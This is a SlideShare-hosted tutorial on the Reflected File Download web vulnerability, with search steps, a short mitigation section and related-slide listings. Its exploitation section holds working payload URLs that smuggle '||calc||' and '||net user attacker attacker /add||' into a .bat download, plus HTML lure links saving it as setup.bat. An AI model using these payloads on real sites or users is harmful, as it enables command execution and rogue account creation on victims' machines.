SlideShare a Scribd company logo
1 of 19
Download to read offline
Reflected	File	Download	
1	
	
	
	
	
	
	
	
	
	
	
Reflected	File	Download	Vulnerability	
	
Narendra	Bhati	
@imnarendrabhati	
https://websecgeeks.com	
narendra.bhati@websecgeeks.com	
	
HTTP/1.1	200	OK	
Content-Type:	application/json;	
Content-Disposition:	attachment		
	
	
	
We	will	talk	about	Reflected	File	Download	Vulnerability	which	is	quite	
less	known	for	most	of	the	researchers.	We	will	see	how	we	can	find	this	
vulnerability,	and	actually	make	an	exploit	to	present	the	impact	in	real	
world	scenario.
Reflected	File	Download	
2	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
	
							Contents:	 	 	 	 	 	 	 	 Page	No	
	
1. Abstract		 	 	 	 	 	 	 	 3	 	 	
2. Introduction	 	 	 	 	 	 	 	 4	
3. Analysis	 	 	 	 	 	 	 	 6	
4. Exploitation	 	 	 	 	 	 	 	 9	
5. Mitigation	 	 	 	 	 	 	 											13
Reflected	File	Download	
3
Reflected	File	Download	
4	
	
	
	
	
	
	
	
	
1.	Abstract	
Modern	applications	are	widely	used	in	today	time,	mostly	as	a		
business	requirement.	We	have	also	seen	many	application	API	calls,	
JSON	based	architecture	for	better	speed	and	interactive	usability	for	
users,	which	make	their	using	experience	better.	
As	the	famous	lines	from	spider	man	goes:	“With	Great	Power	Comes	
Great	Responsibility”.	And	that	phase	can	be	also	applied	in	this	topic.		
Despite	efforts	to	strengthen	the	security,	the	modern	web	applications	
are	still	a	victim	of	many	attacks	and	they	will	be	for	many	years	to	
come.
Reflected	File	Download	
5	
	
	
	
	
	
	
	
	
	
	
2.	Introduction	About	RFD:	
Reflected	File	Download	Vulnerability:	This	vulnerability	allows	an	
attacker	to	trick	any	user	to	download	some	malicious	file.	This	
vulnerability	was	discovered	by	Oren	Hafif	and	he	also	presented	this	
vulnerability	in	back	hat	europe	2014.		
	
RDF	vulnerability	allows	an	attacker	by	tricking	the	victim	to	download	
a	malicious	file	or	script	from	a	trusted	domain.	In	simple	words	an	
attacker	can	abuse	the	trust	of	trust	domain/host	to	target	his	
user/visitors	by	tricking	them	to	download	a	malicious	file	which	
attacks	on	their	system.	
	
For	better	understanding	RFD	we	will	divide	the	vulnerability	into	three	
parts:	Reflected,	File	and	Download.		
	
Let’s	start:	
	
A. Reflected:	
	
As	you	can	see	in	this	screenshot,	the	user	input	“download”	parameter	
value	is	actually	reflecting	back	into	the	response	as	part	of	JSON	Array.
Reflected	File	Download	
6	
	
JSON	is	a	format	for	storing	and	transporting	data.JSON	is	often	used	
when	data	is	sent	from	a	server	to	a	web	page.Its	make	web	application	
more	flexible	and	load	faster.Typical	JSON	array	looks	like	this		
{"firstName":"narendra",	"lastName":"bhati"}	
For	RFD	to	work,	the	reponse	should	be	in	JSON	as	you	can	see	below.	
{"firstName":"narendra",	"lastName":"bhati"}	
	
	
	This	is	the	first	requirement	to	find/approach	for	Reflected	File	
Download	Vulnerability.	
	
	
Info:	download	parameter	value	reflecting	back	into	the	http	response	
as	json	array.	
	
	
This	type	of	input	is	mostly	looks	like		
http://anysite.com/home/search?givemevalue=iambhati&country=indi
a	
http://anysite.com/home/search?givemevalue=iambhati&country=indi
a	
	
Now	this	is	possible	that	parameter	“country”	can	be	reflected	back	into	
the	http	response	as	JSON	Array.
Reflected	File	Download	
7	
	
	
	
B. File:	
	
	
This	is	the	most	important	thing,	which	we	should	look	for	in	the	
Reflected	File	Download	Vulnerability.		
	
The	application	should	allow	us	to	input	special	characters	like	semi	
columns	“;”,	slashes	“/”	and	question	mark	“?”.	Now	why	this	is	
important,	We	will	discuss	in	analysis	part.	
	
C. Download		
	
The	response	should	be	in	downloadable	form	with	user	input	value,	as	
you	can	see	below.	(I	used	the	Chrome	Browser)	
	
	
	
	
	
Info:	Response	is	downloadable	&	inputted	value	is	also	reflecting	back	
in	download	file
Reflected	File	Download	
8	
	
But	there	is	an	issue	with	downloadable	file.	After	observing	this	
behavior	first	look	for	the	http	response	for	“Content-Disposition”	
header.	
If	this	header	is	present	in	the	http	response,	then	it	will	instruct	the	
browser	to	set	a	file	name	to	the	downloaded	file,	which	can	act	as	a	
barrier	for	us.	
	
	
Let's	move	to	the	analysis	part.	
	
	
	
	
3.	Analysis:	
	
Finding	RFD	is	pretty	easy	task,	if	you	approach	it	in	a	good	way.	
	
RFD	are	mostly	presented	on	modern	web	applications	like	JSON	,	API	
Calls,	Every	end	point	which	takes	user	input	dramatically.	For	finding	
such	end	points	you	should	always	keep	eye	on	your	proxies	like	Burp	
Suite,	OWASP	Zap	etc.	
	
If	you	have	carefully	read	the	introduction	part,	then	it	will	be	easy	for	
you	to	understand	this	attack.	
	
Below	is	a	typical	JSON	based	application,	which	is	taking	user	input	
from	parameter	“download”		
URL	Is	–	
http://iamvulnerable.net/home/account/search?download=howareyo
u
Reflected	File	Download	
9	
	
	
	
	
	
As	we	have	observed	that	our	input	is	reflecting	back	into	the	http	
response.	That	great	first	requirement	is	found.	
	
Our	second	requirement	is	that	the	response	should	be	in	downloadable	
form	and	the	target	application	having	the	same	functionality		
	
Our	input	is	reflecting	back	into	the	downloadable	file	without	any	
extension.	
	
	
	
Now	here	the	typical	part	comes	in	the	picture.	As	3rd	requirement	the	
application	should	allow	us	to	enter	any	special	characters	like	“;”,	“?”,	
“/”
Reflected	File	Download	
10	
	
As	we	already	know	that	our	user	input	is	reflecting	back	into	the	
download	file	without	any	file	extension.	Then	now	we	have	to	look	that,	
Can	we	control	the	filename	from	URL	itself.	
	
But	why	are	using	“;”	“/”	“?”	because	when	application	does	not	respond	
with	“content-disposition”	header	then	if	there	browser	will	try	to	get	
the	filename	from	URL	itself.	
	
To	test	this	we	have	perform	some	blind	tries	like.	
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
howareyou	
http://iamvulnerable.net/home/account/search;rfdtest.bat?download=
howareyou	
http://iamvulnerable.net/home/account/;searchrfdtest.bat?download=
howareyou	
http://iamvulnerable.net/home/account/;search;rfdtest.bat?download
=howareyou	
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
howareyou	
http://iamvulnerable.net/home/account/search;/rfdtest.bat?download
=howareyo	
	
To	be	honest	there	is	not	particular	way	to	triaged	this	vulnerability,	But	
you	can	perform	the	same	type	of	approach	by	changing	the	vector,	
because	all	applications		are	having	the		different	behavior.	
	
After	some	times	we	found	that	this	payload	works	
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
howareyou
Reflected	File	Download	
11	
	
And	downloaded	file	is	now	in	“bat”	format	as	you	can	see	below.	
	
	
	
Info:		Downloaded	file	is	now	as	“bat”	format.	
	
	
Now	if	you	open	the	same	file	in	like	“notepad”	then	you	will	find	the	
same	user	input	in	that	“bat”	file.
Reflected	File	Download	
12	
	
	
Finally	we	got	all	our	3	requirements.	
	
● We	can	control	the	user	input.	
● We	can	control	the	file	extension.	
● We	have	the	downloadable	response.	
	
	
	
	
4.	Exploitation	
	
	
Who	knows	how	to	play	with	sword,	can	do	many	kills.	
	
After	getting	all	3	requirements,	now	it's	time	to	exploit	this	
vulnerability.	
	
If	you	observe	the	behavior	of	the	“bat”	file,	Then	you	will	realized	that	
any	command	present	in	the	bat	file,	will	be	executed	directly	in	
windows	shell!		
	
Like	there	is	a	file	called	“mkdir.bat”,	This	file	contents	these	code	
“mkdir	tmp”.	
Now	whenever	this	file	will	get	executed	,	The	code	will	interact	with	
the	windows	shell	and	create	a	new	folder	called	“tmp”.	
	
Same	like	this,	If	you	observe	our	user	input	response	in	downloaded	
file,	You	will	get	to	know	that	we	can	also	inject	our	custom	command	
there.
Reflected	File	Download	
13	
	
	
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
”||calc||	
	
	
	
	
Info:	We	enter	“||calc||	in	the	download	parameter,	Which	can	be	save	
in	that	file.	
	
In	os	shell,	We	can	use	double	commands	in	single	line,	Like	we	can	use	
“	dir	;	date”,	This	command	will	execute	dir	first	then	date.	
	
Just	like	this,	We	can	inject	a	custom	payload	of	command	in	user	input	
which	will	act	as	double	command.	As	you	can	see	below,	I	have	used	
“||calc||.	
Because	double	quite	will	separate	out	this	input	and	break	the	syntax.	
Then	I	have	added	double	pipes,	This	is	an	double	command	operator	
which	will	instruct	the	os	shell	like	this
Reflected	File	Download	
14	
	
Invalidcommand	||	dir	
	
Execute	Command	B	If	Command	A	Failed.	So	as	per	our	payload	
{“owasp”:[“rfd”,””||calc||”,”demo”]}	
	
	
Now	when	this	bat	file	get	executed	windows	shell	will	first	try	to	
execute	{“owasp”:[“rfd”,””	which	is	not	a	valid	command	so	it	will	get	
failed	then	window	shell	will	try	to	execute	second	command	which	is	
“calc”	which	will	directly	execute	the	calculator	program.	
	
	
Info:	File	name	is	rfd2.bat	and	input	value	is	“||calc||	which	will	saved	as	
“bat”
Reflected	File	Download	
15	
	
	
Info:	After	executing	that	file,	The	calculator	got	executed.	
	
We	have	successfully	executed	calculator	from	using	Reflected	File	
Download	Vulnerability.	
	
Now	you	can	use	your	imagination	that	in	how	you	can	use	this	
vulnerability	to	perform	some	malicious	task	on	victim	computer.	
	
For	demonstration,	We	will	create	an	account	in	victim	computer.	
Before	this	lets	check	victim	user	account.
Reflected	File	Download	
16	
	
	
	
	
Now	we	create	a	new	payload	just	like	calc	which	we	did	recently.	
	
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
”||net	user	attacker	attacker	/add||	
	
After	executing	this	URL	a	file	will	be	download	as	“bat”,	as	you	can	see	
below
Reflected	File	Download	
17	
	
	
Info:	We	use	another	payload	which	will	create	an	account	as	attacker	
username	
	
After	executing	this	file,	Some	thing	will	happened	and	gone.	Now	again	
lets	check	the	Victim	user	account.
Reflected	File	Download	
18	
	
	
Oops	we	have	another	user	account	with	attacker.	 	
	
We	can	use	other	browsers	with	some	modification	for	RFD	To	work,	
Using	HTML5	download	attributes	like	below	
	
This	code	can	use	in	Opera	&	Chrome,	After	clicking	on	this,	A	file	will	
download	as	setup.bat	
	
<a	href="	
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
”||net	user	attacker	attacker	/add||"	
download="setup.bat">Download</a>;	
	
	
	
Due	to	browser	behaviors,	some	browser	need	to	get	the	download	in	
different	way,	for	firefox	we	can	use	below	code.	
	
<a	href="	
http://iamvulnerable.net/home/account/searchrfdtest.bat?download=
”||net	user	attacker	attacker	/add||"	download="setup.bat"	
onclick="return	false">Download</a>	
	
	
	
	
	
	
6.	Mitigation
Reflected	File	Download	
19	
	
	
Add	Content-Dispositions:	attachment;	filename	header	which	will	
prevent	the	attacker	to	control	the	file	extension.	
	
Don’t	allow	the	application	to	take	permissive	input.	
	
Limit	the	callback	function	for	“;”	“	
	
	
Conclusion
After analysis of this vulnerability, We can say there is always a
vulnerability/weaknees in modern web applications dosnt matter in which
platform they are made. We should look for every possiblity for every
attack.
Still many organisation think its not a vulnerability because this is affecting
the user/victim machine not the application itself, But After a close look we
can say This vulnerability is happening because of the vulnerable application
and this affecting on their user.There is an another matter of thinking that
this vulnerability is exploiting the trust of the user which they website they
are visiting most.
Source: https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-
Reflected-File-Download-A-New-Web-Attack-Vector.pdf
	
Narendra	Bhati	
@imnarendrabhati	
https://websecgeeks.com	
narendra.bhati@websecgeeks.com

More Related Content

What's hot

Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAjin Abraham
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior
 
Threat modeling with architectural risk patterns
Threat modeling with architectural risk patternsThreat modeling with architectural risk patterns
Threat modeling with architectural risk patternsStephen de Vries
 
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANBEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANSamvel Gevorgyan
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011Samvel Gevorgyan
 
DevSecCon Boston 2018: Building a practical DevSecOps pipeline for free by Je...
DevSecCon Boston 2018: Building a practical DevSecOps pipeline for free by Je...DevSecCon Boston 2018: Building a practical DevSecOps pipeline for free by Je...
DevSecCon Boston 2018: Building a practical DevSecOps pipeline for free by Je...DevSecCon
 
Cyber Security and Open Source
Cyber Security and Open SourceCyber Security and Open Source
Cyber Security and Open SourcePOSSCON
 
Widespread security flaws in web application development 2015
Widespread security flaws in web  application development 2015Widespread security flaws in web  application development 2015
Widespread security flaws in web application development 2015mahchiev
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Web Application Security Guide by Qualys 2011
Web Application Security Guide by Qualys 2011 Web Application Security Guide by Qualys 2011
Web Application Security Guide by Qualys 2011 nat page
 
Getting Single Page Application Security Right
Getting Single Page Application Security RightGetting Single Page Application Security Right
Getting Single Page Application Security RightPhilippe De Ryck
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Cq3210191021
Cq3210191021Cq3210191021
Cq3210191021IJMER
 
Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Philippe De Ryck
 
Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)
Map camp  - Why context is your crown jewels (Wardley Maps and Threat Modeling)Map camp  - Why context is your crown jewels (Wardley Maps and Threat Modeling)
Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)Dinis Cruz
 

What's hot (18)

Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox Addons
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injection
 
Threat modeling with architectural risk patterns
Threat modeling with architectural risk patternsThreat modeling with architectural risk patterns
Threat modeling with architectural risk patterns
 
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANBEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
Project Presentation
Project Presentation Project Presentation
Project Presentation
 
DevSecCon Boston 2018: Building a practical DevSecOps pipeline for free by Je...
DevSecCon Boston 2018: Building a practical DevSecOps pipeline for free by Je...DevSecCon Boston 2018: Building a practical DevSecOps pipeline for free by Je...
DevSecCon Boston 2018: Building a practical DevSecOps pipeline for free by Je...
 
Cyber Security and Open Source
Cyber Security and Open SourceCyber Security and Open Source
Cyber Security and Open Source
 
Widespread security flaws in web application development 2015
Widespread security flaws in web  application development 2015Widespread security flaws in web  application development 2015
Widespread security flaws in web application development 2015
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Web Application Security Guide by Qualys 2011
Web Application Security Guide by Qualys 2011 Web Application Security Guide by Qualys 2011
Web Application Security Guide by Qualys 2011
 
Getting Single Page Application Security Right
Getting Single Page Application Security RightGetting Single Page Application Security Right
Getting Single Page Application Security Right
 
Who Owns Software Security?
Who Owns Software Security?Who Owns Software Security?
Who Owns Software Security?
 
Securing a Cloud Migration
Securing a Cloud MigrationSecuring a Cloud Migration
Securing a Cloud Migration
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Cq3210191021
Cq3210191021Cq3210191021
Cq3210191021
 
Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)
 
Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)
Map camp  - Why context is your crown jewels (Wardley Maps and Threat Modeling)Map camp  - Why context is your crown jewels (Wardley Maps and Threat Modeling)
Map camp - Why context is your crown jewels (Wardley Maps and Threat Modeling)
 

Similar to Reflected File Download Vulnerability - Narendra Bhati

Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application VulnerabilitiesPamela Wright
 
Let's Take Drupal Offline!
Let's Take Drupal Offline!Let's Take Drupal Offline!
Let's Take Drupal Offline!Dick Olsson
 
Mediating Applications on the Android System
Mediating Applications on the Android SystemMediating Applications on the Android System
Mediating Applications on the Android SystemNizar Maan
 
Securing web applications
Securing web applicationsSecuring web applications
Securing web applicationsSupreme O
 
Wi fi Massanger SRS
Wi fi Massanger SRSWi fi Massanger SRS
Wi fi Massanger SRSHashim Ali
 
Elsevier NESE - Spying on the Browser
Elsevier NESE - Spying on the BrowserElsevier NESE - Spying on the Browser
Elsevier NESE - Spying on the BrowserAditya K Sood
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
 
Remote Exploitation of the Dropbox SDK for Android
Remote Exploitation of the Dropbox SDK for AndroidRemote Exploitation of the Dropbox SDK for Android
Remote Exploitation of the Dropbox SDK for AndroidIBM Security
 
Top Cordova Challenges and How to Tackle Them
Top Cordova Challenges and How to Tackle ThemTop Cordova Challenges and How to Tackle Them
Top Cordova Challenges and How to Tackle ThemIonic Framework
 
Secure Android Apps- nVisium Security
Secure Android Apps- nVisium SecuritySecure Android Apps- nVisium Security
Secure Android Apps- nVisium SecurityJack Mannino
 
Secret Web Performance Metric - DevDayBe
Secret Web Performance Metric - DevDayBeSecret Web Performance Metric - DevDayBe
Secret Web Performance Metric - DevDayBeAnna Migas
 
Mitigating Privilege-Escalation Attacks on Android Report
Mitigating Privilege-Escalation Attacks on Android  ReportMitigating Privilege-Escalation Attacks on Android  Report
Mitigating Privilege-Escalation Attacks on Android ReportVinoth Kanna
 
Denial of Service Attacks: The Complete Guide
Denial of Service Attacks: The Complete GuideDenial of Service Attacks: The Complete Guide
Denial of Service Attacks: The Complete GuideImperva
 
Mobile application security
Mobile application securityMobile application security
Mobile application securityShubhneet Goel
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application SecurityIshan Girdhar
 
XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...
XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...
XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...IJNSA Journal
 
XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...
XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...
XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...IJNSA Journal
 
COMP6210 Web Services And Design Methodologies.docx
COMP6210 Web Services And Design Methodologies.docxCOMP6210 Web Services And Design Methodologies.docx
COMP6210 Web Services And Design Methodologies.docxwrite31
 

Similar to Reflected File Download Vulnerability - Narendra Bhati (20)

Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
 
Let's Take Drupal Offline!
Let's Take Drupal Offline!Let's Take Drupal Offline!
Let's Take Drupal Offline!
 
Mediating Applications on the Android System
Mediating Applications on the Android SystemMediating Applications on the Android System
Mediating Applications on the Android System
 
Securing web applications
Securing web applicationsSecuring web applications
Securing web applications
 
Wi fi Massanger SRS
Wi fi Massanger SRSWi fi Massanger SRS
Wi fi Massanger SRS
 
Elsevier NESE - Spying on the Browser
Elsevier NESE - Spying on the BrowserElsevier NESE - Spying on the Browser
Elsevier NESE - Spying on the Browser
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
Remote Exploitation of the Dropbox SDK for Android
Remote Exploitation of the Dropbox SDK for AndroidRemote Exploitation of the Dropbox SDK for Android
Remote Exploitation of the Dropbox SDK for Android
 
Top Cordova Challenges and How to Tackle Them
Top Cordova Challenges and How to Tackle ThemTop Cordova Challenges and How to Tackle Them
Top Cordova Challenges and How to Tackle Them
 
1780 1783
1780 17831780 1783
1780 1783
 
1780 1783
1780 17831780 1783
1780 1783
 
Secure Android Apps- nVisium Security
Secure Android Apps- nVisium SecuritySecure Android Apps- nVisium Security
Secure Android Apps- nVisium Security
 
Secret Web Performance Metric - DevDayBe
Secret Web Performance Metric - DevDayBeSecret Web Performance Metric - DevDayBe
Secret Web Performance Metric - DevDayBe
 
Mitigating Privilege-Escalation Attacks on Android Report
Mitigating Privilege-Escalation Attacks on Android  ReportMitigating Privilege-Escalation Attacks on Android  Report
Mitigating Privilege-Escalation Attacks on Android Report
 
Denial of Service Attacks: The Complete Guide
Denial of Service Attacks: The Complete GuideDenial of Service Attacks: The Complete Guide
Denial of Service Attacks: The Complete Guide
 
Mobile application security
Mobile application securityMobile application security
Mobile application security
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
 
XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...
XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...
XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...
 
XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...
XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...
XDOSER, A BENCHMARKING TOOL FOR SYSTEM LOAD MEASUREMENT USING DENIAL OF SERVI...
 
COMP6210 Web Services And Design Methodologies.docx
COMP6210 Web Services And Design Methodologies.docxCOMP6210 Web Services And Design Methodologies.docx
COMP6210 Web Services And Design Methodologies.docx
 

Recently uploaded

Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...ScyllaDB
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityVictorSzoltysek
 
The Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightThe Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightSafe Software
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGDSC PJATK
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider  Progress from Awareness to Implementation.pptxTales from a Passkey Provider  Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptxFIDO Alliance
 
How to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfHow to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfdanishmna97
 
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Paige Cruz
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctBrainSell Technologies
 
State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!Memoori
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMKumar Satyam
 
Easier, Faster, and More Powerful – Notes Document Properties Reimagined
Easier, Faster, and More Powerful – Notes Document Properties ReimaginedEasier, Faster, and More Powerful – Notes Document Properties Reimagined
Easier, Faster, and More Powerful – Notes Document Properties Reimaginedpanagenda
 
Introduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxIntroduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxFIDO Alliance
 
CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)Wonjun Hwang
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data SciencePaolo Missier
 
Design Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxDesign Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxFIDO Alliance
 
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Skynet Technologies
 
Microsoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - QuestionnaireMicrosoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - QuestionnaireExakis Nelite
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfSrushith Repakula
 
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...FIDO Alliance
 

Recently uploaded (20)

Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps Productivity
 
The Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightThe Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and Insight
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 Warsaw
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider  Progress from Awareness to Implementation.pptxTales from a Passkey Provider  Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
 
How to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfHow to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cf
 
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
